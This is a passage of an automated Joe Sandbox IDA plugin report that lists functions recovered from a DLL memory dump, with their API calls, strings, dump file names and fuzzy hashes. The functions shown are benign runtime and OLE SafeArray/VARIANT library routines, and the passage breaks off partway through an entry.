GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CECA5
__mtterm.LIBCMT ref: 6D0CECB1

Part of subcall function 6D0CE97C: DecodePointer.KERNEL32(00000012,6D0CA397,6D0CA37D,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CE98D
Part of subcall function 6D0CE97C: TlsFree.KERNEL32(00000015,6D0CA397,6D0CA37D,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CE9A7
Part of subcall function 6D0CE97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6D0CA397,6D0CA37D,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0D2325
Part of subcall function 6D0CE97C: DeleteCriticalSection.KERNEL32(00000015,?,?,6D0CA397,6D0CA37D,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0D234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D0CECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D0CECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D0CECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D0CECEE
TlsAlloc.KERNEL32(?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CED3E
TlsSetValue.KERNEL32(00000000,?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CED59
__init_pointers.LIBCMT ref: 6D0CED63
EncodePointer.KERNEL32(?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CED74
EncodePointer.KERNEL32(?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CED81
EncodePointer.KERNEL32(?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CED8E
EncodePointer.KERNEL32(?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CEDBC
__calloc_crt.LIBCMT ref: 6D0CEDD1
DecodePointer.KERNEL32(00000000,?,?,6D0CA2D4,6D0F95C0,00000008,6D0CA468,?,?,?,6D0F95E0,0000000C,6D0CA523,?), ref: 6D0CEDEB
GetCurrentThreadId.KERNEL32 ref: 6D0CEDFD

Strings

FlsSetValue, xrefs: 6D0CECD6
FlsGetValue, xrefs: 6D0CECC9
FlsAlloc, xrefs: 6D0CECC1
KERNEL32.DLL, xrefs: 6D0CECA0
FlsFree, xrefs: 6D0CECE3

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: 4468b711d38a3d862639df4f1ef411f37c952eeba9b9b1f65405cc36b0a02ee3
Instruction ID: 129e4abc153369bfc790c07674b42d9d655fb92c2749d59334250ad815834066
Opcode Fuzzy Hash: 4468b711d38a3d862639df4f1ef411f37c952eeba9b9b1f65405cc36b0a02ee3
Instruction Fuzzy Hash: F2314F31814315AAEF10BF75A80A72E3BFAFB5AA64715452EE524D7290DFB0C441CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D070EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D070EF2
std::_Xinvalid_argument.LIBCPMT ref: 6D070F14
_memmove.LIBCMT ref: 6D070F70
_memmove.LIBCMT ref: 6D070F95
_memmove.LIBCMT ref: 6D070FA9
_memmove.LIBCMT ref: 6D070FDB
_memmove.LIBCMT ref: 6D071182
std::_Xinvalid_argument.LIBCPMT ref: 6D0711B6

Strings

invalid string position, xrefs: 6D0711B1
string too long, xrefs: 6D070EED, 6D070F0F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 597bb556270168d09bc359c3a7a9466d29ede69b9206444665181a4dc42079c5
Instruction ID: a2729a26c3879b1301090e03c81121cc52c902917477659ebb8fa778fd308df3
Opcode Fuzzy Hash: 597bb556270168d09bc359c3a7a9466d29ede69b9206444665181a4dc42079c5
Instruction Fuzzy Hash: 97B15D713141449BFB38CE1DDCA0B9E73BAEB897547548A1CF8928F781C671E841CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D7FC4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 6D0D7FFF
DName::operator=.LIBCMT ref: 6D0D8013
DName::operator+=.LIBCMT ref: 6D0D8021
UnDecorator::getPtrRefType.LIBCMT ref: 6D0D804D
UnDecorator::getDataIndirectType.LIBCMT ref: 6D0D80CA
UnDecorator::getBasicDataType.LIBCMT ref: 6D0D80D3
operator+.LIBCMT ref: 6D0D8166

Strings

volatile, xrefs: 6D0D800B, 6D0D8139
std::nullptr_t, xrefs: 6D0D8122
PXm, xrefs: 6D0D7FE1

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: PXm$std::nullptr_t$volatile
API String ID: 2203807771-315103570
Opcode ID: 749c1dbd6365d8bbcbe3ce2d5ea242adcc91f7f1a0fd207ac84d7ad6bdb8442c
Instruction ID: 55633be30b7eaf795c09d7683afd237f7723ade38e5687fda12ec0939ddeeb1f
Opcode Fuzzy Hash: 749c1dbd6365d8bbcbe3ce2d5ea242adcc91f7f1a0fd207ac84d7ad6bdb8442c
Instruction Fuzzy Hash: 1641DCB5808309BFEBA19F54C881BBD7FB9FF46341F40A06BEA145B241DB708646CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D07F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D07FA0F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D07FA22
SafeArrayGetElement.OLEAUT32 ref: 6D07FA5A

Part of subcall function 6D083A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D083B71
Part of subcall function 6D083A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D083B83

Part of subcall function 6D0869C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
Part of subcall function 6D0869C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
Part of subcall function 6D0869C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Part of subcall function 6D07DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D07DFF6
Part of subcall function 6D07DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D07E003
Part of subcall function 6D07DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D07E02F

Strings

RS7m, xrefs: 6D07FC82
RS{m, xrefs: 6D07FC3E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: RS7m$RS{m
API String ID: 959723449-144615663
Opcode ID: 1b0b9c9b56c20b801209e024a6d16bd0f0330b9e49cb9bd116229214b7232a8f
Instruction ID: a4221b2670169bd817e9bfdfd9bbae02424f4706a1e850c3feec3258327b0aa5
Opcode Fuzzy Hash: 1b0b9c9b56c20b801209e024a6d16bd0f0330b9e49cb9bd116229214b7232a8f
Instruction Fuzzy Hash: ABC13DB0A04605AFEF10DF68CD90FADB7B9AF85304F104199EA49EF286DB71E940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6D083690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D0836CD
VariantInit.OLEAUT32(?), ref: 6D0836DA
VariantInit.OLEAUT32(?), ref: 6D0836E0
VariantInit.OLEAUT32(?), ref: 6D0836E6
VariantInit.OLEAUT32 ref: 6D0837DD
VariantCopy.OLEAUT32(?,?), ref: 6D0837E4
VariantInit.OLEAUT32 ref: 6D083815
VariantCopy.OLEAUT32(?,?), ref: 6D08381C
VariantClear.OLEAUT32(?), ref: 6D0838A8
VariantClear.OLEAUT32(?), ref: 6D0838AE
VariantClear.OLEAUT32(?), ref: 6D0838B4
VariantClear.OLEAUT32(?), ref: 6D0838BA

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 59d60885e03340ce086c68ccd946388672babe74305f1b16acc8046184dd7345
Instruction ID: bf9991fded816d401632595ac88433287f03c44519fa9935064aad305b30d952
Opcode Fuzzy Hash: 59d60885e03340ce086c68ccd946388672babe74305f1b16acc8046184dd7345
Instruction Fuzzy Hash: 10813BB1900219AFEF04DBA8C884FEEBBB9FF89304F14455DE905A7241DB75E905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D08D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D08D8EC
VariantInit.OLEAUT32 ref: 6D08D902
VariantInit.OLEAUT32(?), ref: 6D08D90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D08D929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D08D966
VariantClear.OLEAUT32(?), ref: 6D08D973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6D08D9B4
VariantClear.OLEAUT32(?), ref: 6D08D9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6D08DA6F
VariantClear.OLEAUT32(?), ref: 6D08DA80
VariantClear.OLEAUT32(?), ref: 6D08DA87
VariantClear.OLEAUT32(?), ref: 6D08DA99

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 974a3c8b2b1c5b9e6e2f0310b957ff491865899b3e2e8ee66bf6df9113843b19
Instruction ID: 1d313d0ee6fb0df42ab7071dfc8f7e1cfb578bb4988a6b2a487cd7a62a8fe7d9
Opcode Fuzzy Hash: 974a3c8b2b1c5b9e6e2f0310b957ff491865899b3e2e8ee66bf6df9113843b19
Instruction Fuzzy Hash: 4E8136721083029FDB00CF64C884B5AB7F8FFD9714F148A5DE9959B241E774E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0712A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0712DD
std::_Xinvalid_argument.LIBCPMT ref: 6D0712FB
_memmove.LIBCMT ref: 6D071368
_memmove.LIBCMT ref: 6D07139F
std::_Xinvalid_argument.LIBCPMT ref: 6D07140C

Strings

invalid string position, xrefs: 6D071407
string too long, xrefs: 6D0712D8, 6D0712F6

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 9ced09b01ec34a7cc3e0370db9e8ec55303ab3e8635dcef4ec99658f6fc4401d
Instruction ID: a870be3d531b46a1bea6bc631a1149079805ac4bb5537641e5b1bf2a87861d19
Opcode Fuzzy Hash: 9ced09b01ec34a7cc3e0370db9e8ec55303ab3e8635dcef4ec99658f6fc4401d
Instruction Fuzzy Hash: 4141C4313046049FF734CE6CE8A0B6EB3AAEB85354760592EE591CF6C0C770E84587A7

Uniqueness

Uniqueness Score: -1.00%

Function 6D084BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D084BDC
VariantInit.OLEAUT32(?), ref: 6D084BE5
VariantInit.OLEAUT32(?), ref: 6D084BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D084BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D084C2A
VariantClear.OLEAUT32(?), ref: 6D084C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D085107
VariantClear.OLEAUT32(?), ref: 6D085117
VariantClear.OLEAUT32(?), ref: 6D08511D
VariantClear.OLEAUT32(?), ref: 6D085123

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 0ff21868dc979b25ef07258abe6e2b0b0c885d5f2dd28bd39ba91d822dbcba45
Instruction ID: be6750464b32bdc51895f4bc5e19b0715e68b005631c8cae0f31352ed951076d
Opcode Fuzzy Hash: 0ff21868dc979b25ef07258abe6e2b0b0c885d5f2dd28bd39ba91d822dbcba45
Instruction Fuzzy Hash: 4112F575615706AFDB58DB98DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D07DD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6D07DD10
SafeArrayPutElement.OLEAUT32(00000000,6D082FFF,?), ref: 6D07DD47
VariantClear.OLEAUT32(?), ref: 6D07DD4F
SafeArrayPutElement.OLEAUT32(00000000,6D082FFF,?), ref: 6D07DD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6D07DDA4
VariantClear.OLEAUT32(?), ref: 6D07DDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D07DE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6D07DE27
VariantClear.OLEAUT32(?), ref: 6D07DE31

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: e0586f0d2c99ae78de5d2b9f0f875e2cf1c147a172a983d1fe23e6ab13463a00
Instruction ID: 09ec75df4257fed7358a8035d74979ca06d09dd3fc9ddb59e46956ffd8db5479
Opcode Fuzzy Hash: e0586f0d2c99ae78de5d2b9f0f875e2cf1c147a172a983d1fe23e6ab13463a00
Instruction Fuzzy Hash: 9B513E75900609EFDB11DFA5C884B9EBBB8FF99700F018159EA15DB250DB35E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D07E120 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6D07E29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6D07E2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D07E2D7

Part of subcall function 6D085760: std::tr1::_Xweak.LIBCPMT ref: 6D085769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D07E309

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6D07E523
InterlockedCompareExchange.KERNEL32(6D10C6A4,45524548,4B4F4F4C), ref: 6D07E544

Strings

.m, xrefs: 6D07E551
.m, xrefs: 6D07E4DB, 6D07E4FC, 6D07E4DE

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID: .m$ .m
API String ID: 2722669376-3986117762
Opcode ID: d09f7fc43cdfc7b3d929ea2e02613a911c9ccc3f0d79993210fa35efba14a1ed
Instruction ID: e622064efb0ed861977eddc89f1295ac1c0d555b0df30076d0e885d51f089fa7
Opcode Fuzzy Hash: d09f7fc43cdfc7b3d929ea2e02613a911c9ccc3f0d79993210fa35efba14a1ed
Instruction Fuzzy Hash: 3FD1A471A0520A9FEB20DFA4C884BEE77F8BF45304F158569E605DF280E774E940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D09C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D09C213

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

Strings

gfff, xrefs: 6D09C2EA
gfff, xrefs: 6D09C3A3
gfff, xrefs: 6D09C3F7
gfff, xrefs: 6D09C1F2
vector<T> too long, xrefs: 6D09C20E
gfff, xrefs: 6D09C259
gfff, xrefs: 6D09C222

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
